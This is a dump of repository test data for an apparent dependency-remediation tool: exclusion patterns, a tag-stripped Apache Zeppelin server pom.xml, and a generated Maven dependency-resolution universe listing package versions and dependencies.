**/src/styles/font-awesome* **/src/fonts/Simple-Line* **/src/fonts/simple-line* **/src/fonts/Source-Code-Pro* **/src/fonts/source-code-pro* **/src/**/**.test.js **/e2e/**/**.spec.js package-lock.json **/*.json **/browserslist **/.prettierrc **/.prettierignore 
**/.editorconfig **/src/**/*.svg **/.gitkeep **/src/main/java/org/apache/zeppelin/jdbc/SqlCompleter.java docs/assets/themes/zeppelin/bootstrap/** docs/assets/themes/zeppelin/css/style.css docs/assets/themes/zeppelin/js/docs.js docs/assets/themes/zeppelin/js/search.js docs/_includes/themes/zeppelin/_jumbotron.html docs/_includes/themes/zeppelin/_navigation.html docs/404.html docs/_config.yml docs/_includes/JB/** docs/_layouts/** docs/_plugins/** docs/atom.xml docs/_includes/themes/zeppelin/default.html docs/_includes/themes/zeppelin/page.html docs/_includes/themes/zeppelin/post.html docs/_includes/themes/zeppelin/settings.yml docs/Rakefile docs/rss.xml docs/sitemap.txt docs/search_data.json **/dependency-reduced-pom.xml docs/assets/themes/zeppelin/js/anchor.min.js docs/assets/themes/zeppelin/js/toc.js docs/assets/themes/zeppelin/js/lunr.min.js docs/assets/themes/zeppelin/css/syntax.css docs/_site/** docs/Gemfile.lock **/package.json zeppelin-jupyter-interpreter/src/main/resources/grpc/jupyter/*.py verify.rat verify check org.apache.maven.plugins maven-checkstyle-plugin aggregate false checkstyle-aggregate zeppelin/checkstyle.xml org/apache/zeppelin/interpreter/thrift/*,org/apache/zeppelin/python/proto/* ================================================ FILE: internal/remediation/testdata/zeppelin-server/pom.xml ================================================ 4.0.0 zeppelin org.apache.zeppelin 0.11.1 ./parent zeppelin-server jar Zeppelin: Server 2.30 1.13 2.1 1.11 4.1.0 2.12.6.1 9.13 2.0.0-M15 2.48.2 1.4.01 2.2 ${project.groupId} zeppelin-zengine ${project.version} com.fasterxml.jackson.core jackson-databind com.sun.jersey jersey-core com.sun.jersey jersey-json com.sun.jersey jersey-server com.fasterxml.jackson.core jackson-core org.ow2.asm asm commons-logging commons-logging org.slf4j slf4j-log4j12 org.slf4j slf4j-reload4j org.slf4j jcl-over-slf4j org.apache.httpcomponents httpclient org.slf4j slf4j-reload4j ch.qos.reload4j reload4j org.slf4j jcl-over-slf4j 
io.dropwizard.metrics metrics-servlets ${dropwizard.version} com.fasterxml.jackson.core jackson-databind io.micrometer micrometer-registry-prometheus ${micrometer.version} io.micrometer micrometer-registry-jmx ${micrometer.version} io.dropwizard.metrics metrics-jmx io.dropwizard.metrics metrics-jmx ${dropwizard.version} org.glassfish.jersey.core jersey-client ${jersey.version} javax.annotation javax.annotation-api org.glassfish.jersey.containers jersey-container-servlet-core ${jersey.version} org.glassfish.jersey.media jersey-media-json-jackson ${jersey.version} com.fasterxml.jackson.core jackson-annotations com.fasterxml.jackson.core jackson-databind com.fasterxml.jackson.core jackson-core org.glassfish.jersey.inject jersey-hk2 ${jersey.version} org.glassfish.jersey.core jersey-server ${jersey.version} com.fasterxml.jackson.core jackson-databind ${jackson.version} javax.ws.rs javax.ws.rs-api ${javax.ws.rsapi.version} org.bouncycastle bcpkix-jdk15on commons-collections commons-collections org.apache.shiro shiro-core commons-beanutils commons-beanutils commons-beanutils commons-beanutils 1.9.4 commons-logging commons-logging org.apache.shiro shiro-web org.kohsuke libpam4j ${libpam4j.version} net.java.dev.jna jna net.java.dev.jna jna ${jna.version} org.eclipse.jetty jetty-webapp ${jetty.version} org.eclipse.jetty jetty-jmx ${jetty.version} org.eclipse.jetty.websocket javax-websocket-server-impl ${jetty.version} com.google.code.gson gson com.nimbusds nimbus-jose-jwt ${nimbus.version} org.quartz-scheduler quartz ${quartz.scheduler.version} org.apache.directory.server apacheds-kerberos-codec ${kerberos.version} org.apache.zeppelin zeppelin-zengine ${project.version} tests test com.google.guava guava org.junit.jupiter junit-jupiter-engine test org.hamcrest hamcrest ${hamcrest.version} test org.mockito mockito-core test org.objenesis objenesis org.seleniumhq.selenium selenium-java ${selenium.java.version} test org.seleniumhq.selenium selenium-android-driver 
commons-logging commons-logging xml-apis xml-apis org.eclipse.jetty.websocket websocket-client net.java.dev.jna jna org.apache.commons commons-lang3 com.google.guava guava xml-apis xml-apis ${xml.apis.version} test org.bitbucket.cowwoc diff-match-patch 1.1 maven-failsafe-plugin integration-test verify -Xmx2048m maven-surefire-plugin 1 false -Xmx3g -Xms1g -Dfile.encoding=UTF-8 ${tests.to.exclude} 1 org.apache.maven.plugins maven-jar-plugin test-jar org.apache.maven.plugins maven-dependency-plugin using-source-tree true ../bin using-packaged-distr false ../zeppelin-distribution/target/zeppelin-${project.version}/zeppelin-${project.version}/bin hadoop2 ${hadoop2.7.version} org.apache.hadoop hadoop-common ${hadoop.version} ${hadoop.deps.scope} hadoop3 true ${hadoop3.2.version} hadoop-client-api hadoop-client-runtime org.apache.hadoop ${hadoop-client-runtime.artifact} ${hadoop.version} ${hadoop.deps.scope} ================================================ FILE: internal/remediation/testdata/zeppelin-server/universe.yaml ================================================ # Automatically generated by generate_mock_resolution_universe on 06 Nov 25 09:05 AEDT. DO NOT EDIT. 
system: Maven schema: | antlr:antlr 2.7.7 aopalliance:aopalliance 1.0 asm:asm 3.1 asm:asm-parent 3.1 cglib:cglib-nodep 2.1_3 ch.qos.reload4j:reload4j 1.2.18.3 Opt|javax.mail:mail@1.4.7 Opt|org.apache.geronimo.specs:geronimo-jms_1.1_spec@1.0 1.2.25 Opt|javax.mail:mail@1.4.7 Opt|org.apache.geronimo.specs:geronimo-jms_1.1_spec@1.0 com.esotericsoftware:kryo 4.0.2 com.esotericsoftware:reflectasm@1.11.3 com.esotericsoftware:minlog@1.3.0 org.objenesis:objenesis@2.5.1 com.esotericsoftware:kryo-parent 4.0.2 com.esotericsoftware:minlog@1.3.0 org.objenesis:objenesis@2.5.1 com.esotericsoftware:minlog 1.3.0 com.esotericsoftware:reflectasm 1.11.3 org.ow2.asm:asm@5.0.4 com.fasterxml.jackson.core:jackson-annotations 2.9.9 2.9.10 2.12.6 2.12.7 com.fasterxml.jackson.core:jackson-core 2.9.9 2.9.10 2.12.6 2.12.7 2.13.0 2.15.0 com.fasterxml.jackson.core:jackson-databind 2.9.9 com.fasterxml.jackson.core:jackson-annotations@2.9.0 com.fasterxml.jackson.core:jackson-core@2.9.9 2.9.10.5 com.fasterxml.jackson.core:jackson-annotations@2.9.10 com.fasterxml.jackson.core:jackson-core@2.9.10 2.12.6.1 com.fasterxml.jackson.core:jackson-annotations@2.12.6 com.fasterxml.jackson.core:jackson-core@2.12.6 2.12.7.1 com.fasterxml.jackson.core:jackson-annotations@2.12.7 com.fasterxml.jackson.core:jackson-core@2.12.7 com.fasterxml.jackson.module:jackson-module-jaxb-annotations 2.9.9 com.fasterxml.jackson.core:jackson-annotations@2.9.0 com.fasterxml.jackson.core:jackson-core@2.9.9 com.fasterxml.jackson.core:jackson-databind@2.9.9 Scope provided|javax.xml.bind:jaxb-api@2.2 com.fasterxml.jackson.module:jackson-modules-base 2.9.9 com.fasterxml.jackson:jackson-base 2.9.9 2.9.10 2.9.10.20200621 2.12.6 2.12.7 2.13.0 2.15.0 com.fasterxml.jackson:jackson-bom 2.9.6 2.9.9 2.9.10 2.9.10.20200621 2.12.6 2.12.7 2.12.7.20240502 2.13.0 2.15.0 2.17.1 com.fasterxml.jackson:jackson-parent 2.9.1.1 2.9.1.2 2.12 2.13 2.15 2.17 com.fasterxml:oss-parent 33 34 41 43 50 58 com.github.eirslett:frontend-plugin-core 1.6 
org.codehaus.jackson:jackson-mapper-asl@1.9.13 org.codehaus.jackson:jackson-core-asl@1.9.13 org.apache.commons:commons-compress@1.5 commons-io:commons-io@1.3.2 org.apache.commons:commons-exec@1.3 org.apache.httpcomponents:httpclient@4.5.1 org.codehaus.plexus:plexus-utils@3.0.22 org.slf4j:slf4j-api@1.7.5 com.github.eirslett:frontend-plugins 1.6 com.github.stephenc.jcip:jcip-annotations 1.0-1 com.google.code.findbugs:jsr305 1.3.9 3.0.0 3.0.2 com.google.code.gson:gson 2.3.1 2.8.9 com.google.code.gson:gson-parent 2.8.9 com.google.errorprone:error_prone_annotations 2.0.18 2.1.3 2.18.0 com.google.errorprone:error_prone_parent 2.0.18 2.1.3 2.18.0 com.google.guava:failureaccess 1.0.1 com.google.guava:guava 11.0.2 com.google.code.findbugs:jsr305@1.3.9 Scope provided|com.google.guava:guava-bootstrap@11.0.2 18.0 Opt|com.google.code.findbugs:jsr305@1.3.9 22.0 com.google.code.findbugs:jsr305@1.3.9 com.google.errorprone:error_prone_annotations@2.0.18 com.google.j2objc:j2objc-annotations@1.1 org.codehaus.mojo:animal-sniffer-annotations@1.14 24.1.1-jre com.google.code.findbugs:jsr305@1.3.9 org.checkerframework:checker-compat-qual@2.0.0 com.google.errorprone:error_prone_annotations@2.1.3 com.google.j2objc:j2objc-annotations@1.1 org.codehaus.mojo:animal-sniffer-annotations@1.14 32.0.0-jre com.google.guava:failureaccess@1.0.1 com.google.guava:listenablefuture@9999.0-empty-to-avoid-conflict-with-guava com.google.code.findbugs:jsr305@3.0.2 org.checkerframework:checker-qual@3.33.0 com.google.errorprone:error_prone_annotations@2.18.0 com.google.j2objc:j2objc-annotations@2.8 com.google.guava:guava-parent 11.0.2 18.0 22.0 24.1.1-jre 26.0-android 32.0.0-jre com.google.guava:listenablefuture 9999.0-empty-to-avoid-conflict-with-guava com.google.inject.extensions:extensions-parent 3.0 com.google.inject:guice@3.0 com.google.inject.extensions:guice-servlet 3.0 Scope provided|javax.servlet:servlet-api@2.5 com.google.inject:guice@3.0 com.google.inject:guice 3.0 javax.inject:javax.inject@1 
aopalliance:aopalliance@1.0 org.sonatype.sisu.inject:cglib@2.2.1-v20090111 com.google.inject:guice-parent 3.0 com.google.j2objc:j2objc-annotations 1.1 2.8 com.google.protobuf:protobuf-java 2.5.0 com.google:google 1 5 com.googlecode.javaewah:JavaEWAH 0.7.9 1.1.13 1.2.3 com.helger:parent-pom 1.10.8 com.helger:profiler 1.1.1 Scope provided|javax.ws.rs:javax.ws.rs-api@2.1.1 com.ibm.icu:icu4j 59.1 com.jamesmurty.utils:java-xmlbuilder 0.4 com.jcraft:jsch 0.1.53 Opt|com.jcraft:jzlib@1.0.7 0.1.54 Opt|com.jcraft:jzlib@1.0.7 com.mchange:c3p0 0.9.5.4 com.mchange:mchange-commons-java@0.2.15 com.mchange:mchange-commons-java 0.2.15 Opt|com.typesafe:config@1.3.0 Opt|log4j:log4j@[1.2.14,1.2.15),[1.2.140,1.2.150),[1.2.1400,1.2.1500),[1.2.14000,1.2.15000),[1.2.140000,1.2.150000) Opt|org.apache.logging.log4j:log4j-api@2.7 Opt|org.apache.logging.log4j:log4j-core@2.7 Opt|org.slf4j:slf4j-api@[1.7.5,1.7.6),[1.7.50,1.7.60),[1.7.500,1.7.600),[1.7.5000,1.7.6000),[1.7.50000,1.7.60000) com.nimbusds:nimbus-jose-jwt 9.13 com.github.stephenc.jcip:jcip-annotations@1.0-1 Opt|org.bouncycastle:bcprov-jdk15on@1.68 Opt|org.bouncycastle:bc-fips@[1.0.2,2.0.0) Opt|org.bouncycastle:bcpkix-jdk15on@1.68 Opt|com.google.crypto.tink:tink@1.5.0 9.37.2 com.github.stephenc.jcip:jcip-annotations@1.0-1 Opt|org.bouncycastle:bcprov-jdk15on@1.70 Opt|org.bouncycastle:bcutil-jdk15on@1.70 Opt|org.bouncycastle:bc-fips@[1.0.2,2.0.0) Opt|org.bouncycastle:bcpkix-jdk15on@1.70 Opt MavenExclusions com.google.protobuf:protobuf-java,com.google.code.gson:gson|com.google.crypto.tink:tink@1.10.0 9.37.4 com.github.stephenc.jcip:jcip-annotations@1.0-1 Opt|org.bouncycastle:bcprov-jdk18on@1.81 Opt|org.bouncycastle:bcutil-jdk18on@1.81 Opt|org.bouncycastle:bc-fips@[1.0.2,2.0.0) Opt|org.bouncycastle:bcpkix-jdk18on@1.81 Opt MavenExclusions com.google.protobuf:protobuf-java,com.google.code.gson:gson|com.google.crypto.tink:tink@1.16.0 com.openhtmltopdf:openhtmltopdf-core 1.0.0 com.openhtmltopdf:openhtmltopdf-jsoup-dom-converter 1.0.0 
org.jsoup:jsoup@1.11.3 com.openhtmltopdf:openhtmltopdf-parent 1.0.0 com.openhtmltopdf:openhtmltopdf-pdfbox 1.0.0 org.apache.pdfbox:pdfbox@2.0.16 org.apache.pdfbox:xmpbox@2.0.16 com.openhtmltopdf:openhtmltopdf-core@1.0.0 de.rototor.pdfbox:graphics2d@0.24 com.openhtmltopdf:openhtmltopdf-rtl-support 1.0.0 com.ibm.icu:icu4j@59.1 com.openhtmltopdf:openhtmltopdf-core@1.0.0 com.sun.activation:all 1.2.1 com.sun.activation:jakarta.activation 1.2.1 com.sun.jersey.contribs:jersey-contribs 1.9 com.sun.jersey.contribs:jersey-guice 1.9 Scope provided|javax.servlet:servlet-api@2.5 javax.inject:javax.inject@1 com.google.inject:guice@3.0 com.google.inject.extensions:guice-servlet@3.0 com.sun.jersey:jersey-server@1.9 com.sun.jersey:jersey-client 1.9 Scope provided|org.osgi:osgi_R4_core@1.0 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-core 1.9 Scope provided|javax.ws.rs:jsr311-api@1.1.1 Scope provided|javax.mail:mail@1.4 Scope provided|javax.xml.bind:jaxb-api@2.1 Scope provided|org.osgi:osgi_R4_core@1.0 com.sun.jersey:jersey-json 1.9 org.codehaus.jettison:jettison@1.1 com.sun.xml.bind:jaxb-impl@2.2.3-1 org.codehaus.jackson:jackson-core-asl@1.8.3 org.codehaus.jackson:jackson-mapper-asl@1.8.3 org.codehaus.jackson:jackson-jaxrs@1.8.3 org.codehaus.jackson:jackson-xc@1.8.3 com.sun.jersey:jersey-core@1.9 com.sun.jersey:jersey-project 1.9 com.sun.jersey:jersey-server 1.9 asm:asm@3.1 Scope provided|javax.persistence:persistence-api@1.0 Scope provided|javax.mail:mail@1.4 Scope provided|javax.xml.bind:jaxb-api@2.1 Scope provided|javax.servlet:javax.servlet-api@3.0.1 Scope provided|javax.servlet:jsp-api@2.0 Scope provided|org.glassfish:javax.ejb@3.1 Scope provided|org.jboss.weld:weld-osgi-bundle@1.1.0.Final Scope provided|ant:ant@1.6.5 Scope provided|org.osgi:osgi_R4_core@1.0 com.sun.jersey:jersey-core@1.9 com.sun.xml.bind:jaxb-impl 2.2.3-1 javax.xml.bind:jaxb-api@2.2.2 com.thoughtworks.paranamer:paranamer 2.3 Opt|javax.inject:javax.inject@1 com.thoughtworks.paranamer:paranamer-parent 
2.3 com.typesafe:config 1.3.2 com.vladsch.flexmark:flexmark 0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-builder@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-dependency@0.62.2 com.vladsch.flexmark:flexmark-util-format@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 com.vladsch.flexmark:flexmark-all 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-abbreviation@0.62.2 com.vladsch.flexmark:flexmark-ext-admonition@0.62.2 com.vladsch.flexmark:flexmark-ext-anchorlink@0.62.2 com.vladsch.flexmark:flexmark-ext-aside@0.62.2 com.vladsch.flexmark:flexmark-ext-attributes@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink@0.62.2 com.vladsch.flexmark:flexmark-ext-definition@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji@0.62.2 com.vladsch.flexmark:flexmark-ext-enumerated-reference@0.62.2 com.vladsch.flexmark:flexmark-ext-escaped-character@0.62.2 com.vladsch.flexmark:flexmark-ext-footnotes@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-issues@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-tasklist@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-users@0.62.2 com.vladsch.flexmark:flexmark-ext-gitlab@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-tag@0.62.2 com.vladsch.flexmark:flexmark-ext-media-tags@0.62.2 com.vladsch.flexmark:flexmark-ext-macros@0.62.2 com.vladsch.flexmark:flexmark-ext-ins@0.62.2 com.vladsch.flexmark:flexmark-ext-xwiki-macros@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.vladsch.flexmark:flexmark-ext-toc@0.62.2 com.vladsch.flexmark:flexmark-ext-typographic@0.62.2 
com.vladsch.flexmark:flexmark-ext-wikilink@0.62.2 com.vladsch.flexmark:flexmark-ext-yaml-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-youtube-embedded@0.62.2 com.vladsch.flexmark:flexmark-html2md-converter@0.62.2 com.vladsch.flexmark:flexmark-jira-converter@0.62.2 com.vladsch.flexmark:flexmark-pdf-converter@0.62.2 com.vladsch.flexmark:flexmark-profile-pegdown@0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-builder@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-dependency@0.62.2 com.vladsch.flexmark:flexmark-util-format@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-options@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 com.vladsch.flexmark:flexmark-youtrack-converter@0.62.2 com.vladsch.flexmark:flexmark-ext-abbreviation 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-admonition 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-anchorlink 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-aside 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-jira-converter@0.62.2 com.vladsch.flexmark:flexmark-ext-attributes 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 org.nibor.autolink:autolink@0.6.0 com.vladsch.flexmark:flexmark-ext-definition 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 
com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-jira-converter@0.62.2 com.vladsch.flexmark:flexmark-ext-enumerated-reference 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-attributes@0.62.2 com.vladsch.flexmark:flexmark-ext-escaped-character 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-footnotes 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-issues 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-tasklist 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-users 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gitlab 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-ins 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-front-matter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-yaml-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-tag 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-macros 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gitlab@0.62.2 
com.vladsch.flexmark:flexmark-ext-media-tags 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-tables 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-toc 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-typographic 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-xwiki-macros 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-yaml-front-matter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-youtube-embedded 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-html2md-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji@0.62.2 org.jsoup:jsoup@1.11.3 com.vladsch.flexmark:flexmark-java 0.62.2 com.vladsch.flexmark:flexmark-jira-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink@0.62.2 com.vladsch.flexmark:flexmark-ext-ins@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-pdf-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 org.jsoup:jsoup@1.11.3 com.openhtmltopdf:openhtmltopdf-core@1.0.0 com.openhtmltopdf:openhtmltopdf-pdfbox@1.0.0 
com.openhtmltopdf:openhtmltopdf-rtl-support@1.0.0 com.openhtmltopdf:openhtmltopdf-jsoup-dom-converter@1.0.0 com.vladsch.flexmark:flexmark-profile-pegdown 0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-abbreviation@0.62.2 com.vladsch.flexmark:flexmark-ext-anchorlink@0.62.2 com.vladsch.flexmark:flexmark-ext-aside@0.62.2 com.vladsch.flexmark:flexmark-ext-autolink@0.62.2 com.vladsch.flexmark:flexmark-ext-definition@0.62.2 com.vladsch.flexmark:flexmark-ext-emoji@0.62.2 com.vladsch.flexmark:flexmark-ext-escaped-character@0.62.2 com.vladsch.flexmark:flexmark-ext-footnotes@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-tasklist@0.62.2 com.vladsch.flexmark:flexmark-ext-ins@0.62.2 com.vladsch.flexmark:flexmark-ext-jekyll-front-matter@0.62.2 com.vladsch.flexmark:flexmark-ext-superscript@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.vladsch.flexmark:flexmark-ext-toc@0.62.2 com.vladsch.flexmark:flexmark-ext-typographic@0.62.2 com.vladsch.flexmark:flexmark-ext-wikilink@0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util 0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-builder@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-dependency@0.62.2 com.vladsch.flexmark:flexmark-util-format@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-options@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-ast 0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 
com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 com.vladsch.flexmark:flexmark-util-visitor@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-builder 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-collection 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-data 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-dependency 0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-format 0.62.2 com.vladsch.flexmark:flexmark-util-ast@0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-html@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-html 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-misc 0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-options 0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 com.vladsch.flexmark:flexmark-util-sequence@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-sequence 0.62.2 com.vladsch.flexmark:flexmark-util-collection@0.62.2 com.vladsch.flexmark:flexmark-util-data@0.62.2 com.vladsch.flexmark:flexmark-util-misc@0.62.2 org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-util-visitor 0.62.2 
org.jetbrains:annotations@15.0 com.vladsch.flexmark:flexmark-youtrack-converter 0.62.2 com.vladsch.flexmark:flexmark-util@0.62.2 com.vladsch.flexmark:flexmark@0.62.2 com.vladsch.flexmark:flexmark-ext-gfm-strikethrough@0.62.2 com.vladsch.flexmark:flexmark-ext-tables@0.62.2 com.zaxxer:HikariCP-java7 2.4.13 org.slf4j:slf4j-api@1.7.21 Opt|org.javassist:javassist@3.20.0-GA Opt Scope provided MavenExclusions org.jboss.logging:jboss-logging,org.jboss.logging:jboss-logging-annotations|org.hibernate:hibernate-core@5.0.9.Final Opt Scope provided|io.dropwizard.metrics:metrics-core@3.1.2 Opt Scope provided|io.dropwizard.metrics:metrics-healthchecks@3.1.2 Opt Scope provided|io.prometheus:simpleclient@0.0.16 commons-beanutils:commons-beanutils 1.9.4 commons-logging:commons-logging@1.2 commons-collections:commons-collections@3.2.2 1.11.0 commons-logging:commons-logging@1.3.5 commons-collections:commons-collections@3.2.2 commons-beanutils:commons-beanutils-core 1.8.0 commons-logging:commons-logging@1.1.1 commons-cli:commons-cli 1.4 commons-codec:commons-codec 1.10 1.11 1.14 commons-collections:commons-collections 3.2.1 3.2.2 commons-configuration:commons-configuration 1.6 commons-collections:commons-collections@3.2.1 